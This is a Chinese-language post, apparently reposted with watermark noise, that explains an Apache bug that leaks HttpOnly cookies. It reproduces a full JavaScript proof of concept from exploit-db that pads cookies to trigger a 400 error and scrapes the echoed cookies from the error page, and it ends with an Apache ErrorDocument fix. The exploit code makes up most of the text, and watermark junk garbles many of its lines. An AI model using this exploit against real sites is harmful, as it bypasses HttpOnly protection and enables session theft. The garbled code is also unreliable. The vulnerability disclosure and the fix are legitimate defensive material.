很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而下面这个问题刚好可以用来绕过cookie的这个httponly的属性。
% b# r: y2 x* X/ ]
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
W" o4 s% [7 R# t. O" c& Q- Y
// http://www.exploit-db.com/exploits/18442/
// Helper from the exploit-db listing linked above (reproduced as it appears on
// the page, watermark noise included; it is shown to explain the leak, not as
// a runnable unit).
// good falsy: sets ten cookies xss0..xss9, each carrying the 819-byte run of
//   'x' built below, with path=/ — presumably to push the browser's Cookie
//   header past the server's request-header limit so the next request is
//   answered with a 400 (see makeRequest below).
// good === true: re-sets the same ten names with an already-past expiry date
//   so the browser discards them again (cleanup once the response was read).
// Defender note: a burst of cookies named xss<digit> whose values are long
//   runs of 'x' is a usable detection signature for this probe in
//   access/error logs; the mitigation is described at the end of the page.
0 h! X! @( q5 nfunction setCookies (good) {+ n5 J9 ]% @6 q" K/ A% f4 D# ?1 P
// Construct string for cookie value
7 X# f) Y1 c! K) U' b$ Xvar str = "";' i3 o/ H& l( I0 L" h$ O
for (var i=0; i< 819; i++) {
% X; C0 u8 G7 q5 d8 Bstr += "x";
+ V4 [4 |! O3 {" k$ V' C4 t) F9 @$ ^}
! g: |, e. O2 @4 t) t! M2 y// Set cookies
+ I- M7 i1 v9 @& d# g! ofor (i = 0; i < 10; i++) {
6 W" W1 I, n: G6 o# E// Expire evil cookie (expiry one millisecond in the past)
if (good) {
& h& k' m5 u5 @5 d# o' E+ O8 }var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
2 ~' i9 ?6 f' L7 r6 t}
- E; ~' N/ ` y& {9 ]$ V% W// Set evil cookie
8 x5 L9 m4 V+ K+ Felse {9 D: O" Z# }& w0 B& c, [# D
var cookie = "xss"+i+"="+str+";path=/";6 [/ V8 a' }6 _- c$ N
}% c s: ^; y+ W$ p; d) ?
document.cookie = cookie;
) D4 e. w- @3 C2 v' j; w' {* B$ m}
; g! p2 b9 e! G}) U, K0 H" W& U) [% }" r
// Sends a GET to the site root with the padded cookies attached and, when the
// server answers 400, scrapes the echoed Cookie header out of the error page.
// document.cookie cannot read HttpOnly cookies (see the note at the top of the
// page); the leak here is the server's 400 response body, which on the affected
// Apache versions repeats the offending request header inside <pre>...</pre>.
// Mitigation (see the end of the page): a custom ErrorDocument 400 message, or
// upgrading Apache. Reproduced with the page's watermark noise intact.
function makeRequest() {; a$ r- ?5 h! w2 m2 P0 t
setCookies();' r' p( f) D/ E2 y
// readyState listener; closes over the xhr declared (var-hoisted) further down.
function parseCookies () {
2 f9 I" b9 @& D+ f" T( }var cookie_dict = {};/ i! ]6 e( C. w* }# K
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {3 r: T' Z8 C5 }4 `
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
/ }9 Z" T( r) Z$ j4 Kif (content.length) {: w3 \. m+ h, Z% V% [9 U
// Remove Cookie: prefix
3 b8 ?+ l5 k) K% K2 ]6 t- \content = content[1].replace("Cookie: ", "");3 X" x# {+ I/ W) n; J' ^
// Drop the xss<digit> padding cookies, then split what remains on ';'
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);: p# c! c% l$ T7 F8 k
// Add cookies to object (intended as name -> value pairs)
for (var i=0; i<cookies.length; i++) {
9 b9 {& M+ z" {8 V+ F, n1 cvar s_c = cookies.split('=',2);0 i+ S" I/ m% p) m* G N' [1 L
cookie_dict[s_c[0]] = s_c[1];- E! z/ r+ m; ?
}. |# ]6 k: K3 v) T& G8 Q
}
' I) K1 X% g0 R, R5 J// Unset malicious cookies (same ten names, past expiry)
setCookies(true);* l, q' s6 P: `* t. j
alert(JSON.stringify(cookie_dict));. x$ |8 ^. x/ a# W! j% b7 W' |
}
3 v9 I( x0 I3 Z* D& E' X7 ^}
8 U ~$ A; ~3 |// Make XHR request to "/" with the padded cookies attached
var xhr = new XMLHttpRequest();
* ~( j! i( J; A. q! i/ u* gxhr.onreadystatechange = parseCookies;
5 Z4 A, N9 `) Y( @0 r; J: ? o) Pxhr.open("GET", "/", true);) c& u3 o( z1 H8 i( S. H( R% }# \
xhr.send(null);. w [- y6 x& @* l2 I
}+ U9 A8 ~2 o3 T" b/ X9 S
// Runs the probe immediately when the listing is pasted into the console.
makeRequest();- G% c, g' D4 j
你就能看见华丽丽的400错误响应,其中包含着cookie信息。
- x; j- t) @# L* Q( o( |
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
0 e3 c2 ~/ w4 [! v
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
7 t* `% h5 y$ `3 z2 f( r& e& c' M7 t a1 P/ q/ o' y
In the event of a problem or error, Apache can be configured to do one of four things,
$ D' z: a/ P" W) ~3 a6 ^3 U6 W6 j. i; I& R! t1 R |0 q. a
1. output a simple hardcoded error message 输出一个简单的硬编码错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
; |8 l/ u4 Y$ S% d9 s2 q
经测试,对于400错误只有方法2有效:返回包不会再包含cookie内容。
4 Q8 H1 X: L+ v- y9 d2 F+ k
Apache配置:
1 |8 l' i( N, E( d
ErrorDocument 400 "security test"
8 u Y. B- y$ A+ l# U+ G7 T
当然,升级apache到最新版本也可以解决:)。
+ @4 z$ z, t3 C8 j8 |8 U! D1 J F3 _4 a; z @
参考:http://httpd.apache.org/security/vulnerabilities_22.html
3 c" s& d& V8 T8 t* G
|